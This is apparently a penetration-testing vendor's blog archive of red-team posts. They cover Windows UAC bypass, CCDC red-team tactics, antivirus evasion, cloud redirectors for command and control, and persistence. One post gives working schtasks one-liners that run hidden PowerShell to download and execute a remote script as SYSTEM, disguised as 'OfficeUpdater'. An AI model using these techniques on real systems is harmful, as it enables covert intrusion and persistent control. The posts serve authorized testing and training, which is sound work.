Archive for the ‘Red Team’ Category

h1

User Account Control – What Penetration Testers Should Know

March 20, 2014

UAC is User Account Control. Introduced in Windows Vista, UAC is a collection of technologies that make it convenient possible to use Windows without administrator privileges and elevate your rights when needed. UAC has a lot of moving parts and encompasses a lot of things.

This post focuses on Windows Integrity levels and UAC elevation prompts. I will first explain some UAC concepts and then dive into three attacks to get past UAC.

Process Integrity Levels

In Windows Vista and later, processes run at three different levels of integrity: high, medium, and low. A high integrity process has administrator rights. A medium integrity process is one that runs with standard user rights. A low integrity process is very restricted.

A low integrity process can not write to the registry and it’s limited from writing to most locations in the current user’s profile. Protected Mode Internet Explorer runs with low integrity. The idea is to limit the amount of damage an attacker may do if they exploit the browser.

Most desktop applications run in a medium integrity process, even if the current user is a local administrator. Use Process Explorer to see which Integrity level your programs are running at.

procexp

UAC Settings

To perform a privileged action, a program must run another program and request the high integrity level at that time. If the user is an administrator, what happens next will depend on their UAC settings. There are four UAC settings:

Always Notify. This setting is the highest UAC setting. It will prompt the user when any program, including a built-in Windows program wants higher privileges.

Notify me only when programs try to make changes to my computer. This is the default UAC setting. This setting does not prompt the user when some built-in Windows program want higher privileges. It will prompt the user when any other program wants higher privileges. This distinction is important and it plays into the UAC bypass attack that we will cover in a moment.

Notify me only when programs try to make changes to my computer (do not dim my desktop). This is the same as the default setting, except the user’s desktop does not dim when the UAC elevation prompt comes up. This setting exists for computers that lack the computing power to dim the desktop and show a dialog on top of it.

Never notify. This option takes us back to life before Windows Vista. On Windows 7, if a user is an administrator, all of their programs will run with high integrity. On Windows 8, programs run at the medium integrity level, but anything run by an Administrator that requests elevated rights gets them without a prompt.

If the user is not an administrator, they will see a prompt that asks for the username and password of a privileged user when a program tries to elevate. Microsoft calls this “over the shoulder” elevation as someone is, presumably, standing over the shoulder of the user and typing in their password. If the UAC settings are set to Never Notify, the system will automatically deny any requests to elevate.

Who Am I?

When I get a foothold from a client-side attack, I have a few questions I like to answer right away. First, I like to know which user I’m currently executing code as. Second, I like to know which rights I have. With UAC this becomes especially complicated.

One way I like to sort myself out is with the Windows command: whoami /groups.

This command will print which groups my current user belongs to.

This command will also print which integrity level my command ran with. If my command ran in a high integrity context, I will see the group Mandatory Label\High Mandatory Level. This means I have administrator rights.

17.26.20 cmd_exe_2320_2

If my command ran in a medium integrity context, I will see the group Mandatory Label\Medium Mandatory Level. This means I have standard user rights.

17.26.31 cmd_exe_3588_1

RunAs

If I find myself in a medium integrity process run by a user in an administrators group, there is potential to elevate from standard user rights to administrator user rights. One option is to use the ShellExecute function with the runas verb. This will run a program and request elevated rights.

If UAC is set to anything other than Never Notify, the user will see a prompt that asks them if they would like to allow the action to happen. This is not completely implausible. Oracle’s Java Updater randomly prompts me all of the time.

The Metasploit Framework’s exploit/windows/local/ask module by mubix implements this attack for you. Make sure you set EXE::Custom to avoid anti-virus!

javaupdater

If the user accepts the prompt, the system will run my program in a high integrity context. Remember, medium integrity is standard user rights. High integrity is administrator rights and this is what we’re after.

Bypass UAC

The RunAs option prompts the user and that’s an opportunity to get caught. We want a way to spawn a high integrity process from a medium integrity process without a prompt. Fortunately, there is a way to do this, it’s the bypass UAC attack.

This attack comes from Leo Davidson who made a proof-of-concept for it in 2009. David Kennedy and Kevin Mitnick popularized this attack in a 2011 DerbyCon talk. They also released the exploit/windows/local/bypassuac Metasploit Framework module that uses Leo’s proof-of-concept for the heavy lifting.

The bypass UAC attack requires that UAC is set to the default Notify me only when programs try to make changes to my computer. If UAC is set to Always Notify, this attack will not work. This attack also requires that our current user is in an administrators group.

Bypass UAC: How It Works

This is a fascinating attack whose inner workings are taken for granted. Please allow me the blog space to describe it in depth:

Our story starts with COM, the Component Object Model in Windows. COM is a way of writing components that other programs may use and re-use. One of the benefits of COM is that it’s language neutral. I find it extremely complicated and unappealing to work with. I suspect others share my feelings.

Some COM objects automatically elevate themselves to a high integrity context when run from a program signed with Microsoft’s code signing certificate. If the same COM object is instantiated from a program that was not signed by Microsoft, it runs with the same integrity as the current process.

The COM distinction between Microsoft and non-Microsoft programs has little meaning though. I can’t create a COM object in a high integrity context  because my programs are not signed with Microsoft’s certificate. I can spawn a Microsoft-signed program (e.g., notepad.exe) and inject a DLL into it though. From this DLL, I may instantiate a self-elevating COM object of my choice. When this COM object performs an action, it will do so from a high integrity context.

Leo’s Bypass UAC attack creates an instance of the IFileOperation COM object. This object has methods to copy and delete files on the system. Run from a high integrity context, this object allows us to perform a privileged file copy to any location on the system.

We’re not done yet! We need to go from a privileged file copy to code execution in a high integrity process. Before we can make this leap, I need to discuss another Windows 7 fun fact.

Earlier, we went over the different UAC settings. The default UAC setting will not prompt the user when some built-in Windows programs try to elevate themselves. More practically, this means that some built-in Windows programs always run in a high integrity context.

These programs that automatically elevate have a few properties. They are signed with Microsoft’s code signing certificate. They are located in a “secure” folder (e.g., c:\windows\system32). And, they request the right to autoElevate in their manifest.

We can find which programs autoElevate themselves with a little strings magic:

cd c:\windows\
strings –s *.exe | findstr /i autoelevate

Now, we know which programs automatically run in a high integrity context AND we have the ability to perform an arbitrary copy on the file system. How do we get code execution?

We get code execution through DLL search order hijacking. The public versions of the bypass UAC attack copy a CRYPTBASE.dll file to c:\windows\system32\sysprep and run c:\windows\system32\sysprep.exe. When sysprep.exe runs it will search for CRYPTBASE.dll and find the malicious one first.

Because sysprep.exe automatically runs in a high integrity context (when UAC is set to default), the code in the attacker controlled CRYPTBASE.dll will execute in this high integrity context too. From there, we’re free to do whatever we like. We have our administrator privileges.

Holy Forensic Artifacts Batman!

I mentioned earlier that the Metasploit Framework’s bypassuac module uses Leo Davidson’s proof-of-concept. This module drops several files to disk. It uses Leo’s bypassuac-x86.exe (and bypassuac-x64.exe) to perform the privileged file copy from a medium integrity context. It also drops a CRYPTBASE.dll file to disk and  the executable we want to run.

This module, when run, also creates a tior.exe and several w7e_*.tmp files in the user’s temp folder. I have no idea what the purpose of these files are.

When you use this module, you control the executable to run through the EXE::Custom option. The other artifacts are put on disk without obfuscation. For a long time, these other artifacts were caught by anti-virus products. A recent commit to the Metasploit Framework strips several debug and logging messages from these artifacts. This helps them get past the ire of anti-virus, for now.

bewareav

A better approach is to use a module that has as little on-disk footprint as possible. Fortunately, Metasploit contributor Ben Campbell (aka Meatballs) is here to save the day. A recent addition to the Metasploit Framework is the exploit/windows/local/bypassuac_inject module.  This module compiles the UAC bypass logic into a reflective DLL. It spawns a Microsoft-signed program and injects the UAC bypass logic directly into it. The only thing that needs to touch disk is the CRYPTBASE.dll file.

Bypass UAC on Windows 8.1

In this post, I’ve focused heavily on Windows 7. Leo’s proof-of-concept and the bypassuac modules in the Metasploit Framework do not work on Windows 8.1. This is because the DLL hijacking opportunity against sysprep.exe does not work in Windows 8.1. The Bypass UAC attack is still possible though.

A few releases ago, I added bypassuac to Cobalt Strike’s Beacon. I do not invest in short-term features, so I had to convince myself that this attack had a viable future. I audited all of the autoElevate programs on a stock Windows 8.1 to find another DLL hijacking opportunity. I had to find a program that would load my DLL before displaying anything to the user. There were quite a few false starts. In the end, I found my candidate.

Beacon’s Bypass UAC command is similar to Ben Campbell’s, it performs all of the UAC bypass logic in memory. Beacon’s UAC bypass also generates an anti-virus safe DLL from Cobalt Strike’s Artifact Kit. Beacon’s UAC bypass checks the system it’s running on too. If it’s Windows 7, Beacon uses sysprep.exe to get code execution in a high integrity context. If it’s Windows 8, it uses another opportunity.

If you’re having trouble with the alternatives, Beacon’s version of this attack is an option.

Bypass UAC on Windows Vista

The Bypass UAC attack does not work on Windows Vista. In Windows Vista, the user has to acknowledge every privileged action. This is the same as the Always Notify option in Windows 7 and later. The UAC settings in Windows 7 came about because UAC became a symbol of what was “wrong” with Windows Vista. Microsoft created UAC settings and made some of their built-in programs auto-elevate by default to prompt the user less often. These changes for user convenience created the loophole described in this post.

Lateral Movement and UAC

The concept of process integrity level only applies to the current system. When you interact with a network resource, your access token is all that matters. If your current user is a domain user and your domain user is a local administrator on another system, you can get past UAC. Here’s how this works:

You may use your token to interact with another system as an administrator. This means you may copy an executable to that other system and schedule it to run. If you get access to another system this way, you may repeat the same process to regain access to your current system with full rights.

You may use the Metasploit Framework’s exploit/windows/local/current_user_psexec to do this.

Summary

These UAC bypass attacks are among my favorite hacker techniques. They’re a favorite because they take advantage of a design loophole rather than a fixed-with-the-next-update memory corruption flaw. In theory, we will have these attacks for a long time.

h1

CCDC Red Teams: Ten Tips to Maximize Success

March 4, 2014

The CCDC season is upon us. This is the time of year when professionals with many years of industry experience “volunteer” to hack against college students who must defend computer networks riddled with security holes.

For the second year, my company is making Cobalt Strike available to members of the National CCDC and Regional CCDC red teams. In this post, I’d like to share a few tips for red team members who plan to use Cobalt Strike at their event.

0×01: Learn how to use Cobalt Strike

Most offensive security professionals are instantly productive with Cobalt Strike. It leverages the Metasploit Framework, which most CCDC red teamers have had some exposure to. Cobalt Strike builds on Armitage which has a positive reputation for ease of use.

These things are deceptive though. Cobalt Strike is built for power users and it has a lot of depth. To get the most from the tool, it really requires some time spent to learn how to use it. You could stop reading now and sum up this post as “read the manual” and “learn to use the tool” before hand.

I publish all of my company’s training, for free, on the Cobalt Strike website. This is a great way to get a start with the tool. I will also mail a DVD with penetration testing labs to any CCDC red team member that asks for one (the announcement sent to the red teams has the link to request one).

0×02: Have a persistence strategy

Cobalt Strike does not ship with a persistence kit. Once you get on a system, you will need a strategy to fortify your access. If you do not persist, students will kick you out with the next reboot and likely, you’ll find it hard or impossible to get back in.

Good persistence is hard. It’s easy to make a mistake with a persistence mechanism. If you persist in a way that does not work, expect to spend most of your CCDC event without access.

Cobalt Strike’s scripting language, Cortana, is an opportunity to automate your persistence. This is a task that also makes sense for a local Metasploit module. Either way you go–make sure you prepare and test something before the event. Dirty Red Team Tricks I and II at DerbyCon both address past persistence strategies for CCDC.

0×03: Learn to use Beacon

Beacon is the star feature in Cobalt Strike. I built it to provide a low and slow lifeline to spawn Meterpreter sessions, as needed. It’s grown far beyond this original task. You can use Beacon to pivot into a network, to conduct post-exploitation on a host, and even as a named-pipe backdoor that you can use and re-use at will.

Spawning new sessions with Beacon is easy. Someone who has never seen Cobalt Strike or Beacon can understand how to do it after thirty seconds of training. The other use cases are power user features and require time spent with the tool and its documentation to take advantage of. Imagine sitting in front of a meterpreter> prompt for the first time. How to get the most out of the tool isn’t intuitive. It’s the same with Beacon.

0×04: Learn to Setup Beacon Infrastructure

Beacon is a multi-protocol remote access tool. It speaks HTTP, DNS A records, DNS TXT records, and it talks over SMB named pipes. There’s a time and place for each of these features (or they wouldn’t exist). If you use Beacon to egress a compromised network, you will want to set up infrastructure to receive your connections.

Let’s start with Beacon’s HTTP mode. Sure, you can configure Beacon to call home to your IP address. A few clicks and it’s setup. If you want to make your Beacon resilient to blocks and harder to detect–you will want it to call home to multiple IP addresses. In a CCDC environment, you can bind multiple IP addresses to a system and tell Beacon to use them. If your event has internet access, you can set up “redirectors” in Amazon’s EC2 to act as a proxy between your Cobalt Strike system and your blue networks. Either way, multiple addresses are a must.

DNS Beacon requires some setup as well. You need to own several domains and understand DNS well enough to delegate these domains or sub-domains to your Cobalt Strike system. DNS Beacon also has its nuances. By default, it stages over HTTP, but it is also possible to stage DNS Beacon over (go figure) DNS. The Beacon lecture in the Tradecraft course dives deep into how to set this up.

DNS Beacon is amazing for long-haul low and slow command and control. It’s very survivable and few blue teams look for abuse of DNS. If you’re not using this, you’re missing out on a great tool to challenge the strongest blue teams.

0×05: Plan an opening salvo

The best time to get access at a CCDC event is in the beginning, when the systems are most vulnerable. I don’t pre-script an opening salvo anymore. I do it by hand. Here’s my process to hook all Windows systems:

I run a quick nmap scan for port 445 only. I do db_nmap –sV –O –T4 –min-hostgroup 96 –p 445 [student ranges here]. I have this command pasted into a window and I press enter the moment I hear the word go.

Once the scan complete I highlight all hosts in the Cobalt Strike table view (Ctrl+A). If I know the default credentials, I launch psexec against all of the hosts.

If I don’t know the default credentials, I launch ms08_067_netapi. Once I get my first session, I run mimikatz to get the default credentials and I launch psexec against all of the hosts again.

These steps are simple enough that I can do them by hand. Doing these steps by hand also gives me flexibility to adapt, if I quickly notice something isn’t working.

I recommend that the red team lead designate someone to go through these steps. This same person should have a script ready to install persistence on the Windows hosts that they get access too. Ideally, you should have a similar process for the *NIX side too.

0×06: Decide how you want to organize your red team

What kind of experience do you want the students to get at your CCDC event? This question will drive how you organize your red team.

Do you want the students to experience a variety of attacks against all aspects of the networks they must defend? If so, I would organize your red team by function. Have a team that’s going after websites. Have a team that’s attacking Windows systems. Have another team that’s attacking wireless stuff.

Do you want the students to gain experience hunting a well embedded adversary? I would split your red team up into cells that each focus on an individual blue team. These teams will focus on maintaining access to blue systems and, in sync with the other cells, occasionally causing something catastrophic to happen (e.g., putting customer credit card information on the company’s website).

This model works well when each red cell has the support of one global cell in charge of an opening salvo and persistence. This way all teams are compromised the same way and each cell has a fallback to regain access to a network if they need it.

This model also solves another critical issue: feedback. If two red team members focus on one blue team, they will become an expert in that team’s strengths and weaknesses. At the end of the event, you can send your red team members out to their blue team for a very educational dialog.

It’s important to have a model in mind. Without a model, the red team will devolve into organized chaos with ad-hoc cells chasing targets of opportunity rather than deliberate actions that create educational value for the students.

0×07: Build infrastructure to support your red team’s organization

Once you decide how you will organize your red team, make sure you have infrastructure setup to support it. Cobalt Strike’s team servers are a convenient way to share access to systems and networks. This isn’t the whole picture though.

Your team will need a way to exchange information in real-time. Cobalt Strike’s team server has a chatroom, but in all the events I go to, I have never seen the Cobalt Strike (or Armitage) chatroom become the primary place to exchange information. IRC and Etherpad both work well for this purpose.

When you setup Cobalt Strike’s team servers, make sure you have enough to support your model. If you choose to organize your red team into cells that each focus on a blue team, have one team server per blue team. Also, provide your global access management team with two team servers to manage persistent Beacons through.

Whatever you do, do not run all red team activity through one team server.

0×08: Have a backup plan for persistence

I mentioned earlier that you should have a persistence plan. Whatever your plan is, it probably isn’t enough. Create a backup persistence plan. It’s dangerous to rely on one tool or method to stay inside of ten very closely watched networks.

I like configuration backdoors for persistence, a lot. These backdoors work, especially well, if you never have to use them. If you don’t use something, a blue team doesn’t get a hint that leads them to it.

If someone on your team is familiar with another persistent agent (or they wrote one)–move them to the persistence/access management cell and have them manage it for all of the blue teams.

A persistence plan that consists of Beacon, a few choice configuration changes, and an alternate agent is very robust.

0×09: Learn to pass sessions and connect to multiple servers

Distributed Operations is one of three force multipliers for red team operations. In February 2013, Cobalt Strike gained a way to manage multiple team servers from one client. The idea is this:

One Cobalt Strike client can connect to multiple team servers. Switching between active servers is easy. When the client tries to pass a session or task a Beacon, it sees listeners from all of the servers it has a connection to.

This simple concept makes it possible for cells on a red team to overlap and work with each other. For example, let’s say my job is access management and persistence. I have low and slow Beacons for all Windows systems at my disposal. If a cell needs a session from me, I connect to their team server (or perhaps, I was already on it) and I simply task the appropriate Beacons to send a session to the listener that they setup. That’s it.

Tradecraft, lecture 9, talks about the mechanics of session passing and distributed ops in detail.

0x0A: Learn how to interoperate between Cobalt Strike and non-Cobalt Strike users

If you run a red team–I do not recommend that you force-feed one toolset to your team. If you want to do this, do it with a toolset other than mine. It’s possible to derive 95% of Cobalt Strike’s sharing and distribution benefits–even if some red teamers don’t use Cobalt Strike.

To share network footholds, become familiar with how to set up a Metasploit and Beacon SOCKS server. These SOCKS servers will allow someone else on your red team to tunnel their tools into your network. They can do it through the Proxies option in Metasploit or with the proxychains command on Linux.

You may also pass accesses to another Metasploit user with great ease. The way to do this is hacky, but it works. Create a dummy team server and connect to it. On this team server, create listeners with host, port, and payload values that match payload handlers that your other teammates use. The team server will start a handler for the listener you define, but, when you task it–the session will go to the teammate not using Cobalt Strike.

The Key Ingredients

Despite the joke in the opening paragraph, CCDC is hard. It’s easy to get into networks early on. It’s hard to stay in those networks and challenge the student teams throughout the event.

In this post, I brought up a number of things to consider for red team success at a CCDC event. With or without Cobalt Strike, a successful engagement requires a strategy and an active commitment to prepare for and follow through on that strategy. I hope these tips will help you prepare for your event.

Good luck!

h1

What took so long? (A little product philosophy)

February 20, 2014

Cobalt Strike’s  January 8, 2014 release generates executables that evade many anti-virus products. This is probably one of the most requested features for Cobalt Strike.

Given the demand–why did it take so long for me to do something about it?

One-off anti-virus evasion is trivial. In 2012, I wrote a one-off stager for Windows Meterpreter. Few products caught it then. Few catch it now. Why? Because very few people use it. There’s no reason for an anti-virus vendor to write signatures against it.

When I use Cobalt Strike–I always bring a collection of private scripts to generate artifacts when I need them. I’ve never had a problem with anti-virus. Many of my users have their own process to generate artifacts. Good stuff is available publicly too. For example, Veil is a fantastic artifact generator.

If anti-virus evasion is so trivial–why didn’t I build new artifacts into Cobalt Strike until now?

Long-term Utility

Every feature I build has to have long-term utility. I want tools that will help get into networks and evade defenses five to ten years from now.

If I built short-term features, my work would hit a local optima that I may not escape. Over time, each improvement would serve only to balance the faded utility of the old things next to it. Without maintenance, a product with short-term features would decay until it’s not useful.

Long-term focus has the opposite benefit. If I do my job right, each release is more useful to my users than any previous release. New features interact well with existing ones and all features become more useful. This sounds like common sense… but it’s not a natural course for software.

Imagine a toolset built around locating known service vulnerabilities and launching remote exploits. Seven years ago–this hypothetical toolset could rule the world. Today? This toolset’s utility would diminish with each day as it’s built for yesterday’s attack surface. Even with patchwork improvements, the best days for this kit are in the past. A few client-side attacks next to a rusty Windows 2003 rootkit creates an image of a dilapidated amusement park with one ride that still works. The world does change and sometimes these changes will obsolete what was otherwise good. At this point, it’s time to reinvent. I feel this is where we are with penetration testing tools.

Expected Life

Every time I build something–I ask, how does this give my users and I an advantage today, tomorrow, and next year? Or better put–what is the expected life of this capability?

On the offense side–a lot of our technology has a comically short expected life. Exploits are a good example of this. Once the vulnerability an exploit targets is patched–the clock starts ticking. Every day that exploit loses utility as fewer opportunities will exist to use it. I don’t build exploits and it’s not a focus of my product. A single exploit is not a long-term advantage. A team or community of exploit developers? They’re a long-term advantage. I leverage the great work in the Metasploit Framework for this. But, in terms of value add, I have to find other places to provide a long-term advantage.

What types of technologies provide a long-term advantage? Reconnaissance technologies are a long-term advantage. NMap will probably have use in the hacker’s toolbag for, at least, our lifetime. A reconnaissance tool is a life extender for your existing kit of attack options. A three-year old Internet Explorer exploit isn’t interesting—except when a reconnaissance technology helps you realize that your target is vulnerable to it. This is why I put so much effort into Cobalt Strike’s System Profiler. The System Profiler helps my users squeeze more use out of the client-side exploits in the Metasploit Framework.

Can you think of other technologies that provide a long-term advantage? Remote Administration Payloads. Meterpreter is almost ten years old. Even though it’s gained features—the Windows implementation is the same core that Skape put together a long time ago. Any effort to make post-exploitation better will pay dividends to users many years from now. So long as there’s a way to fire a payload and get it on a system–it has utility. Well, almost. There’s one pain point to this.

The Big Hunt

On the offensive side–we are in the middle of a shift. My ass was kicked by it three years ago. If you haven’t had your ass kicked by this yet–it’s coming, I promise. What’s this offensive ass kicking shift? It’s pro-active network security monitoring as a professional focus and the people who are getting good at it. Our tools are not ready for this. Our tools assume we have the freedom to get out of a network and communicate as much as we like through one channel. These assumptions hold in some cases, but they break in high security environments. What’s the next move? I’ll give you mine.

I’ve built a multi-protocol payload with ways to control its chattiness, flexibility to use redirectors, peer-to-peer communication to limit my egress points, and in a pinch–the ability to tunnel other tools through it. Why did I do this? If I can’t get out of a network with my existing tools–I’m out of the game. If I can’t maintain a stable lifeline into my target’s network–I’m out of the game. If all of my compromised systems phone home to one system–I’m easy to spot and take out of the game.

We had a free pass to use a compromised network without contest. This is coming to an end. Sophisticated attackers evolved their communication methods years ago. We need tools that provide real stealth if we’re going to continue to claim to represent a credible threat.

I work on stealth communication with Beacon, because I see a long-term benefit to this work. I see Browser Pivoting as a technique with a long-term benefit as well. Two-factor authentication hit an adoption tipping point last year and it will disrupt our favored ways to get at data and demonstrate risk. Browser Pivoting is a way to work in this new world. When I look at the offensive landscape, I see no lack of problems to solve.

Anti-virus Evasion – Revisited

What’s a problem that I didn’t touch, because of the short life expectancy of any one solution? I didn’t want to build a public artifact collection to get past anti-virus.

I remember when the US pen tester community became aware of Hyperion. Researchers from NullSecurity.net wrote a paper on a novel way to defeat any anti-virus sandbox. The technique? Encrypt a payload with a weak key and embed it into an executable with a stub of code to brute force the key. Anti-virus products would give up emulating the binary before the key was brute forced–allowing the executable to pass.

This technique is a long-term advantage. Any one of us can write our own anti-virus bypass generator that uses the Hyperion technique. So long as we keep our generator and its stub to ourselves, it will last a long time. We didn’t do this though. We took the Hyperion proof-of-concept and used it as-is without changes. What happened? Eventually anti-virus vendors wrote signatures for a stub of code in the public binary and then the technique left our minds, even though it’s still valid.

Let’s go back to the original question. Why didn’t I add anti-virus evasion artifacts until now? I didn’t work on this problem because I didn’t have a sustainable plan. I do now.

I wrote an Artifact Kit. The Artifact Kit is a simple source code framework to generate executables that smuggle payloads past anti-virus. Better, the Artifact Kit is able to build DLLs, executables, and Windows dropper executables. I expect that, in the future, Artifact Kit will also build my persistence executables as well.

I updated Cobalt Strike to use the Artifact Kit to generate executables. My psexec dialogs use it. My Windows Dropper attack uses it. I even found that the Metasploit Framework’s Firefox add-on module fired with an Artifact Kit executable becomes a nice way to get a foothold on a fully patched system. This is an example of a new feature complementing existing tools and extending their life and utility.

Artifact Kit’s techniques have a limited lifetime. The more use it gets–the more likely an analyst will spend the time to write signatures and negate the utility of the Artifact Kit. One technique isn’t sustainable. What’s the plan then?

I published the source code to Artifact Kit along with different techniques to a place my customers have access to. I also provided Cortana hooks to make Cobalt Strike use any changes that I or my customers can dream up. Now, anti-virus evasion in Cobalt Strike doesn’t hinge on one technique. It’s a strategy. As soon as one kit gets burned, swap in a new one, and magically everything in the tool that uses it will work. It took some time to think up a flexible abstraction that makes sense. I’m pretty happy with what I have now.

If you’re a developer of offensive capabilities–ask a few questions before you commit to a problem. What is the shelf-life of your solution? Is there a way to extend the life of your solution–if it runs out? And, finally, does your solution have the potential to extend the life of other capabilities? These are the questions I ask to make sure my output has the most impact possible.

h1

Obituary: Java Self-Signed Applet (Age: 1.7u51)

January 21, 2014

The Java Signed Applet Attack is a staple social engineering option. This attack presents the user with a signed Java Applet. If the user allows this applet to run, the attacker gets access to their system. Val Smith’s 2009 Meta-Phish paper made this attack popular in the penetration testing community.

Last week’s Java 1.7 update 51 takes steps to address this vector. By default, Java will no longer run self-signed applets. This free lunch is over.

javanodice

A lot of pen testers use an applet signed with a self-signed code signing certificate. For a long time–this was good enough. The old dialog to run a self-signed applet wasn’t scary. And, thanks to the prevalence of self-signed applets in legitimate applications, users were already familiar with it.

javaolder

Over time, Oracle added aggressive warnings to the self-signed applet dialog. These warnings didn’t stop users from running malicious self-signed applets though.

javawarning

Starting with Java 1.7u51, we should not rely on self-signed Java applets in our attacks. Going forward, we will need to sign our applet attacks with a valid code signing certificate. This isn’t a bad thing to do. Signing an applet makes the user prompt much nicer. 

javavalid

Even with a valid code signing certificate–it’s dangerous to assume a Java attack will continue to “always work” in social engineering engagements. Java is heavily abused by attackers. I expect more organizations will disable it in the browser altogether (when they can). We should update our social engineering process to stay relevant.

Here’s my recommendation:

Always profile a sample of your target’s systems before exploitationI wrote a System Profiler to help with this. A System Profiler is a web application that maps the client-side attack surface for anyone who visits it. Reconnaissance extends the life of all attack vectors by allowing an informed decision about the best attack for a target’s environment.

If Java makes sense for a target’s profile–use it. If Java doesn’t make sense, look at social engineering attack vectors beyond Java. The Microsoft Office Macro Attack is another good option to get a foothold. In environments that do not use application whitelisting yet, a simple Windows Dropper attack will work too.

h1

Cloud-based Redirectors for Distributed Hacking

January 14, 2014

A common trait among persistent attackers is their distributed infrastructure. A serious attacker doesn’t use one system to launch attacks and catch shells from. Rather, they register many domains and setup several systems to act as redirectors (pivot points) back to their command and control server.

redirectors_t2

As of last week, Cobalt Strike now has full support for redirectors. A redirector is a system that proxies all traffic to your command and control server. A redirector doesn’t need any special software. A little iptables or socat magic can proxy traffic for you. Redirectors don’t need a lot of power either. You can use a cheap Amazon EC2 instance to serve as a redirector.

Here’s the socat command to forward connections to port 80 to 54.197.3.16:

socat TCP4-LISTEN:80,fork TCP4:54.197.3.16:80

The TCP4-LISTEN argument tells socat to listen for a connection on the port I provide. The fork directives tells socat that it should fork itself to manage each connection that comes in and continue to wait for new connections in the current process. The second argument tells socat which host and port to forward to.

Redirectors are great but you need payloads that can take advantage of them. You want the ability to stage through a redirector and have command and control traffic go through your other redirectors. If one redirector gets blocked—the ideal payload would use other redirectors to continue to communicate.

Cobalt Strike’s Beacon can do this. Here’s the new Beacon listener configuration dialog:

beacon_redirector

You may now specify which host Beacon and other payloads should stage through. Press Save and Beacon will let you specify which redirectors Beacon should call home to as well:

beacon_hosts_redirector

The Metasploit Framework and its payloads are designed to stage from and communicate with the same host. Despite this limitation these payloads can still benefit from redirectors. Simply spin up a redirector dedicated to a Meterpreter listener. Provide the address of the redirector when you create the listener.

meterp_redirector

Now, one Cobalt Strike instance, has multiple points of presence on the internet. Your Beacons call home to several hosts. Your Meterpreter sessions go through their own redirector. You get the convienence of managing all of this on one team server though.

If you want Meterpreter to communicate through multiple redirectors then tunnel it through Beacon. Use Beacon’s meterpreter command to stage Meterpreter and tunnel it through the current Beacon. This will take advantage of the redirectors you configured the Beacon listener to go through.

h1

Schtasks Persistence with PowerShell One Liners

November 9, 2013

One of my favorite Metasploit Framework modules is psh_web_delivery. You can find it in exploits -> windows -> misc. This module starts a local web server that hosts a PowerShell script. This module also provides a PowerShell one liner to download this script and run it. I use this module all of the time in my local testing. Here’s the output of the module:

pshwebdelivery

When I provide red team support at an event, persistence is something that usually falls into my lane. Sometimes, people catch my persistence when they find an EXE or DLL artifact with a recent timestamp. Ever since I started to use psh_web_delivery in my testing, I wondered if I could also use it for persistence without dropping an artifact on disk. The answer is yes.

Here’s how to do it with schtasks:

#(X86) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System

#(X86) - On System Start
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System

#(X86) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30

#(X64) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System

#(X64) - On System Start
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30

Each of these one liners assumes a 32-bit PAYLOAD.

I’m not a PowerShell developer, so the hardest part of this exercise for me was the quoting. I’ve never seen anything quite like PowerShell’s convention for escaping quotes. PowerShell includes an option to evaluate a Base64-encoded one liner. I tried to go this route, but I hit the character limit for the task I could schedule.

One interesting note–you may schedule a task for the user idle event as a non-privileged user. If you need to survive a reboot on a system that you can’t escalate on, this is an option. If you test this option–beware that Windows checks if the user is idle once every fifteen minutes or so. If you schedule an onidle event for 1 minute, don’t expect to see a session one minute later.

h1

Tradecraft – Red Team Operations Course and Notes

October 18, 2013

A few days ago, I posted the YouTube playlist on Twitter and it’s made a few rounds. That’s great. This blog post properly introduces the course along with a few notes and references for each segment.

Tradecraft is a new nine-part course that provides the background and skills needed to execute a targeted attack as an external actor with Cobalt Strike. I published this course to help you get the most out of the tools I develop.

If you’d like to jump into the course, it’s on YouTube:

Here are a few notes to explore each topic in the course with more depth.

1. Introduction

The first part of tradecraft introduces the course, the Metasploit Framework, and Cobalt Strike. If you already know Armitage or the Metasploit Framework–you don’t need to watch this segment. The goal of this segment is to provide the base background and vocabulary for Metasploit Framework novices to follow this course.

To learn more about the Metasploit Framework:

Cobalt Strike:

Targeted Attacks and Advanced Persistent Threat:

  • Read Intelligence-Driven Computer Network Defense from Lockheed Martin. The process in this course maps well to the “systematic process to target and engage an adversary” presented in this paper. If you need to exercise controls that detect, deny, disrupt, degrade, or deceive an adversary–I know a product that can help :)
  • Watch Michael Daly’s 2009 USENIX talk, The Advanced Persistent Threat. This talk pre-dates the marketing bonanza over APT actors and their work. This is a common sense discussion of the topic without an agenda. Even though it’s from 2009, the material is spot on.

Advanced Persistent Threat Campaigns

These actors managed to compromise thousands of hosts and steal data from them for years, without detection. Cobalt Strike’s aim is to augment the Metasploit Framework to replicate these types of threats.

2. Basic Exploitation (aka Hacking circa 2003)

